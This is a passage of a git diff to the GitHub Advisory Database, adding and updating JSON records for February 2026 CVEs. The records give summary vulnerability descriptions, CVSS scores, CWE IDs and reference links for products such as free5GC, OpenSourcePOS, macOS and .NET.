+} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json b/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json new file mode 100644 index 0000000000000..4b374e9eea703 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7v9f-f4qv-fcxh/GHSA-7v9f-f4qv-fcxh.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7v9f-f4qv-fcxh", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-1790" + ], + "details": "Local privilege escalation in Genetec Sipelia Plugin. An authenticated low-privileged Windows user could exploit this vulnerability to gain elevated privileges on the affected system.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:U/CR:H/IR:H/AR:H/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:H/MVI:H/MVA:H/MSC:X/MSI:H/MSA:H/S:P/AU:N/R:X/V:C/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1790" + }, + { + "type": "WEB", + "url": "https://techdocs.genetec.com/r/en-US/Security-Updates-for-SipeliaTM-2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-250" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json index 583c0515f5221..26d18da71a8ff 100644 --- a/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json +++ b/advisories/unreviewed/2026/02/GHSA-8xrx-9wj4-6775/GHSA-8xrx-9wj4-6775.json @@ -37,7 +37,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-377" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json index 71b182c662e59..3fdb1c5373ebf 100644 --- a/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json +++ b/advisories/unreviewed/2026/02/GHSA-c5gm-v7v7-vjx9/GHSA-c5gm-v7v7-vjx9.json @@ -45,7 +45,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-22" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json b/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json new file mode 100644 index 0000000000000..566f6f187b641 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cgmm-x5ww-q5cr/GHSA-cgmm-x5ww-q5cr.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cgmm-x5ww-q5cr", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2026-26226" + ], + "details": "beautiful-mermaid versions prior to 0.1.3 contain an SVG attribute injection issue that can lead to cross-site scripting (XSS) when rendering attacker-controlled Mermaid diagrams. User-controlled values from Mermaid style and classDef directives are interpolated into SVG attribute values without proper escaping, allowing crafted input to break out of an attribute context and inject arbitrary SVG elements/attributes into the rendered output. When the generated SVG is embedded in a web page, this can result in script execution in the context of the embedding origin.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26226" + }, + { + "type": "WEB", + "url": "https://github.com/lukilabs/beautiful-mermaid/pull/8" + }, + { + "type": "WEB", + "url": "https://github.com/lukilabs/beautiful-mermaid/releases/tag/v0.1.3" + }, + { + "type": "WEB", + "url": "https://neo.projectdiscovery.io/share/cec71dc7-a8eb-417e-b8b4-666644796c1e" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/beautiful-mermaid-svg-attribute-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json b/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json index 2318643dfd18f..bce80abbf7b42 100644 --- a/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json +++ b/advisories/unreviewed/2026/02/GHSA-cm39-88fp-pv6j/GHSA-cm39-88fp-pv6j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cm39-88fp-pv6j", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20624" ], "details": "An injection issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3, macOS Sonoma 14.8.4. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json b/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json new file mode 100644 index 0000000000000..c9d4b3634317b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fq6p-4h82-858f/GHSA-fq6p-4h82-858f.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fq6p-4h82-858f", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70122" + ], + "details": "A heap buffer overflow vulnerability in the UPF component of free5GC v4.0.1 allows remote attackers to cause a denial of service via a crafted PFCP Session Modification Request. The issue occurs in the SDFFilterFields.UnmarshalBinary function (sdf-filter.go) when processing a declared length that exceeds the actual buffer capacity, leading to a runtime panic and UPF crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70122" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/746" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json index 37b01af86dc3f..3ed2ead753663 100644 --- a/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json +++ b/advisories/unreviewed/2026/02/GHSA-fqf2-x743-9564/GHSA-fqf2-x743-9564.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json b/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json index 6f87148c28743..109964fac8eab 100644 --- a/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json +++ b/advisories/unreviewed/2026/02/GHSA-h6jx-x5f4-qmj9/GHSA-h6jx-x5f4-qmj9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h6jx-x5f4-qmj9", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20623" ], "details": "A permissions issue was addressed by removing the vulnerable code. This issue is fixed in macOS Tahoe 26.3. An app may be able to access protected user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json b/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json index f2448d2f4681c..6a6a16057b1db 100644 --- a/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json +++ b/advisories/unreviewed/2026/02/GHSA-h892-rh45-x8jp/GHSA-h892-rh45-x8jp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h892-rh45-x8jp", - "modified": "2026-02-13T06:30:48Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-13T06:30:48Z", "aliases": [ "CVE-2025-15520" ], "details": "The RegistrationMagic WordPress plugin before 6.0.7.2 checks nonces but not capabilities, allowing for the disclosure of some sensitive data to subscribers and above.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-13T06:16:10Z" diff --git a/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json b/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json new file mode 100644 index 0000000000000..85d71bffe0028 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j98c-62jj-x3h3/GHSA-j98c-62jj-x3h3.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j98c-62jj-x3h3", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70123" + ], + "details": "An improper input validation and protocol compliance vulnerability in free5GC v4.0.1 allows remote attackers to cause a denial of service. The UPF incorrectly accepts a malformed PFCP Association Setup Request, violating 3GPP TS 29.244. This places the UPF in an inconsistent state where a subsequent valid PFCP Session Establishment Request triggers a cascading failure, disrupting the SMF connection and causing service degradation.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70123" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/745" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json b/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json index 200deaa254608..3092e58eb79b4 100644 --- a/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json +++ b/advisories/unreviewed/2026/02/GHSA-jhq4-533p-8p4c/GHSA-jhq4-533p-8p4c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jhq4-533p-8p4c", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2026-20608" ], "details": "This issue was addressed through improved state management. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-770" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json b/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json index 6f0497ef22ac3..21e93d4d54400 100644 --- a/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json +++ b/advisories/unreviewed/2026/02/GHSA-m7rx-q9f3-3p96/GHSA-m7rx-q9f3-3p96.json @@ -30,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json b/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json index fd782e26d81f6..eddabd2081f8b 100644 --- a/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json +++ b/advisories/unreviewed/2026/02/GHSA-p47v-wp9g-8362/GHSA-p47v-wp9g-8362.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p47v-wp9g-8362", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20609" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted file may lead to a denial-of-service or potentially disclose memory contents.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -48,8 +53,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:04Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json index 1e43ff6433e4b..b6d3c0bc1c860 100644 --- a/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json +++ b/advisories/unreviewed/2026/02/GHSA-p5cr-gq3j-93c4/GHSA-p5cr-gq3j-93c4.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p5cr-gq3j-93c4", - "modified": "2026-02-13T00:32:51Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-13T00:32:51Z", "aliases": [ "CVE-2025-70845" ], "details": "lty628 aidigu v1.9.1 is vulnerable to Cross Site Scripting (XSS) exists in the /setting/ page where the \"intro\" field is not properly sanitized or escaped.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T22:16:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json index d4716738bd91d..372a3a4a8ad50 100644 --- a/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json +++ b/advisories/unreviewed/2026/02/GHSA-p5wr-5p37-2wm6/GHSA-p5wr-5p37-2wm6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p5wr-5p37-2wm6", - "modified": "2026-02-07T00:30:27Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-07T00:30:27Z", "aliases": [ "CVE-2026-1731" @@ -23,6 +23,10 @@ "type": "WEB", "url": "https://beyondtrustcorp.service-now.com/csm?id=csm_kb_article&sysparm_article=KB0023293" }, + { + "type": "WEB", + "url": "https://github.com/win3zz/CVE-2026-1731" + }, { "type": "WEB", "url": "https://www.beyondtrust.com/trust-center/security-advisories/bt26-02" diff --git a/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json b/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json new file mode 100644 index 0000000000000..a1ff3a4c32013 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qqhc-37jx-7gh5/GHSA-qqhc-37jx-7gh5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qqhc-37jx-7gh5", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70095" + ], + "details": "A cross-site scripting (XSS) vulnerability in the item management and sales invoice function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70095" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70095.md" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json b/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json new file mode 100644 index 0000000000000..b61da74c7afe4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r3p8-h9vv-9cqc/GHSA-r3p8-h9vv-9cqc.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3p8-h9vv-9cqc", + "modified": "2026-02-13T18:31:24Z", + "published": "2026-02-13T18:31:24Z", + "aliases": [ + "CVE-2025-70093" + ], + "details": "An issue in OpenSourcePOS v3.4.1 allows attackers to execute arbitrary code via returning a crafted AJAX response.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70093" + }, + { + "type": "WEB", + "url": "https://github.com/opensourcepos/opensourcepos/pull/4357" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70093.md" + }, + { + "type": "WEB", + "url": "https://www.opensourcepos.org" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json b/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json new file mode 100644 index 0000000000000..576b5627e73f5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vwfj-gc28-j2fg/GHSA-vwfj-gc28-j2fg.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwfj-gc28-j2fg", + "modified": "2026-02-13T18:31:24Z", + "published": "2026-02-13T18:31:24Z", + "aliases": [ + "CVE-2025-70091" + ], + "details": "A cross-site scripting (XSS) vulnerability in the Customers function of OpenSourcePOS v3.4.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Phone Number parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70091" + }, + { + "type": "WEB", + "url": "https://github.com/hungnqdz/cve-research/blob/main/CVE-2025-70091.md" + }, + { + "type": "WEB", + "url": "https://www.opensourcepos.org" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T16:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json b/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json new file mode 100644 index 0000000000000..d7196d2e1ca2c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w7w9-2vjv-7r67/GHSA-w7w9-2vjv-7r67.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w7w9-2vjv-7r67", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2026-2026" + ], + "details": "A vulnerability has been identified where weak file permissions in the Nessus Agent directory on Windows hosts could allow unauthorized access, potentially permitting Denial of Service (DoS) attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2026" + }, + { + "type": "WEB", + "url": "https://www.tenable.com/security/tns-2026-05" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json b/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json new file mode 100644 index 0000000000000..24f82d3dbbe7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-x3j4-874w-h7pv/GHSA-x3j4-874w-h7pv.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-x3j4-874w-h7pv", + "modified": "2026-02-13T18:31:25Z", + "published": "2026-02-13T18:31:25Z", + "aliases": [ + "CVE-2025-70121" + ], + "details": "An array index out of bounds vulnerability in the AMF component of free5GC v4.0.1 allows remote attackers to cause a denial of service via a crafted 5GS Mobile Identity in a NAS Registration Request message. The issue occurs in the GetSUCI method (NAS_MobileIdentity5GS.go) when accessing index 5 of a 5-element array, leading to a runtime panic and AMF crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70121" + }, + { + "type": "WEB", + "url": "https://github.com/free5gc/free5gc/issues/747" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-13T17:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json index f5c1fe7f502f8..175244e5405e2 100644 --- a/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json +++ b/advisories/unreviewed/2026/02/GHSA-xrqq-m9vv-pq36/GHSA-xrqq-m9vv-pq36.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xrqq-m9vv-pq36", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-13T18:31:24Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20619" ], "details": "A logging issue was addressed with improved data redaction. This issue is fixed in macOS Sequoia 15.7.4, macOS Tahoe 26.3. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:05Z" From 767802338fa8c1dbd8944581598134d805b99b23 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 13 Feb 2026 19:45:13 +0000 Subject: [PATCH 067/215] Publish GHSA-qvhc-9v3j-5rfw --- .../02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json index bbc291a2be5e0..eaff76ee3608b 100644 --- a/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json +++ b/advisories/github-reviewed/2026/02/GHSA-qvhc-9v3j-5rfw/GHSA-qvhc-9v3j-5rfw.json @@ -1,18 +1,14 @@ { "schema_version": "1.4.0", "id": "GHSA-qvhc-9v3j-5rfw", - "modified": "2026-02-12T17:44:46Z", + "modified": "2026-02-13T19:43:22Z", "published": "2026-02-10T21:32:18Z", "aliases": [ "CVE-2026-21218" ], "summary": "Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability", - "details": "# Microsoft Security Advisory CVE-2026-21218 | .NET Security Feature Bypass Vulnerability\n\n## Executive summary\n\nMicrosoft is releasing this security advisory to provide information about a vulnerability in .NET 8.0, .NET 9.0, and .NET 10.0. This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.\n\nAn attacker could exploit this vulnerability by crafting a malicious payload that bypasses the security checks in the affected System.Security.Cryptography.Cose versions, potentially leading to unauthorized access or data manipulation.\n\n## Announcement\n\nAnnouncement for this issue can be found at https://github.com/dotnet/announcements/issues/380\n\n## Mitigation factors\n\nIf your application does not use System.Security.Cryptography.Cose it is not affected. By default, no .NET applications reference this component.\n\n## Affected Packages\nThe vulnerability affects any Microsoft .NET project if it uses any of affected packages versions listed below\n\n### .NET 10\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[System.Security.Cryptography.Cose](https://www.nuget.org/packages/System.Security.Cryptography.Cose) | >= 10.0.0, < 10.0.2 | 10.0.3\n\n### 